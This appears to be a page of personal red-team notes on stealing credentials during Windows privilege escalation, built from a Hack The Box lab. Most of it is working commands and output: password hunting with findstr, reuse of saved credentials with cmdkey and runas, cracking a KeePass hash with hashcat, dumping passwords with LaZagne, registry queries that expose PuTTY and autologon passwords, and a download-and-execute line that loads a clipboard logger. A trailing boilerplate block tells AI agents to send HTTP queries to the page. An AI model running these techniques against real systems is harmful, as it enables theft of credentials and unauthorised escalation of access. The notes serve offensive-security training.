# Credential Theft ## Credentials Hunting Command để hunting file có password ```powershell PS C:\htb> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml ``` Powershell history save path ```powershell PS C:\htb> (Get-PSReadLineOption).HistorySavePath C:\Users\htb-student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` ## Sticky Notes Passwords Location ```powershell C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite ``` View sticky note db ```powershell PS C:\htb> ls Directory: C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/25/2021 11:59 AM 20480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session -a---- 5/25/2021 11:59 AM 982 Ecs.dat -a---- 5/25/2021 11:59 AM 4096 plum.sqlite -a---- 5/25/2021 11:59 AM 32768 plum.sqlite-shm -a---- 5/25/2021 12:00 PM 197792 plum.sqlite-wal ``` ## CMDKey saved credentials ```powershell C:\htb> cmdkey /list Target: LegacyGeneric:target=TERMSRV/SQL01 Type: Generic User: inlanefreight\bob ``` Credentials này tự động fill khi RDP Runas với saved credentials ``` PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE" ``` ## Extracting KeePass Hash ```powershell endy21@htb[/htb]$ python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx ILFREIGHT_Help_Desk:$keepass$*2*60000*222*f49632ef7dae20e5a670bdec2365d5820ca1718877889f44e2c4c202c62f5fd5*2e8b53e1b11a2af306eb8ac424110c63029e03745d3465cf2e03086bc6f483d0*7df525a2b843990840b249324d55b6ce*75e830162befb17324d6be83853dbeb309ee38475e9fb42c1f809176e9bdf8b8*63fdb1c4fb1dac9cb404bd15b0259c19ec71a8b32f91b2aaaaf032740a39c154 ``` ```powershell endy21@htb[/htb]$ hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v6.1.1) starting... Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 $keepass$*2*60000*222*f49632ef7dae20e5a670bdec2365d5820ca1718877889f44e2c4c202c62f5fd5*2e8b53e1b11a2af306eb8ac424110c63029e03745d3465cf2e03086bc6f483d0*7df525a2b843990840b249324d55b6ce*75e830162befb17324d6be83853dbeb309ee38475e9fb42c1f809176e9bdf8b8*63fdb1c4fb1dac9cb404bd15b0259c19ec71a8b32f91b2aaaaf032740a39c154:panther1 Session..........: hashcat Status...........: Cracked Hash.Name........: KeePass 1 (AES/Twofish) and KeePass 2 (AES) Hash.Target......: $keepass$*2*60000*222*f49632ef7dae20e5a670bdec2365d...39c154 Time.Started.....: Fri Aug 6 11:17:47 2021 (22 secs) Time.Estimated...: Fri Aug 6 11:18:09 2021 (0 secs) Guess.Base.......: File (/opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 276 H/s (4.79ms) @ Accel:1024 Loops:16 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 6144/14344385 (0.04%) Rejected.........: 0/6144 (0.00%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:59984-60000 Candidates.#1....: 123456 -> iheartyou Started: Fri Aug 6 11:17:45 2021 Stopped: Fri Aug 6 11:18:11 2021 ``` ## Hunting Credent With LaZagne ```powershell PS C:\htb> .\lazagne.exe -h usage: lazagne.exe [-h] [-version] {chats,mails,all,git,svn,windows,wifi,maven,sysadmin,browsers,games,multimedia,memory,databases,php} ... |====================================================================| | | | The LaZagne Project | | | | ! BANG BANG ! | | | |====================================================================| positional arguments: {chats,mails,all,git,svn,windows,wifi,maven,sysadmin,browsers,games,multimedia,memory,databases,php} Choose a main command chats Run chats module mails Run mails module all Run all modules git Run git module svn Run svn module windows Run windows module wifi Run wifi module maven Run maven module sysadmin Run sysadmin module browsers Run browsers module games Run games module multimedia Run multimedia module memory Run memory module databases Run databases module php Run php module optional arguments: -h, --help show this help message and exit -version laZagne version ``` ```powershell PS C:\htb> .\lazagne.exe all |====================================================================| | | | The LaZagne Project | | | | ! BANG BANG ! | | | |====================================================================| ########## User: jordan ########## ------------------- Winscp passwords ----------------- [+] Password found !!! URL: transfer.inlanefreight.local Login: root Password: Summer2020! Port: 22 ------------------- Credman passwords ----------------- [+] Password found !!! URL: dev01.dev.inlanefreight.local Login: jordan_adm Password: ! Q A Z z a q 1 [+] 2 passwords have been found. For more information launch it again with the -v option elapsed time = 5.50499987602 ``` ## PUTTY ```powershell PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh Present REG_DWORD 0x1 HostName REG_SZ LogFileName REG_SZ putty.log ProxyDNS REG_DWORD 0x1 ProxyLocalhost REG_DWORD 0x0 ProxyMethod REG_DWORD 0x5 ProxyHost REG_SZ proxy ProxyPort REG_DWORD 0x50 ProxyUsername REG_SZ administrator ProxyPassword REG_SZ 1_4m_th3_@cademy_4dm1n! ``` ## Autologon ```powershell C:\htb>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 AutoAdminLogon REG_SZ 1 DefaultUserName REG_SZ htb-student DefaultPassword REG_SZ HTB_@cademy_stdnt! ``` ## Clipboard ```powershell PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1') PS C:\htb> Invoke-ClipboardLogger ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://endy.gitbook.io/endys-notes/red-teaming/priv-escalation/windows-priv-escalation/credential-theft.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.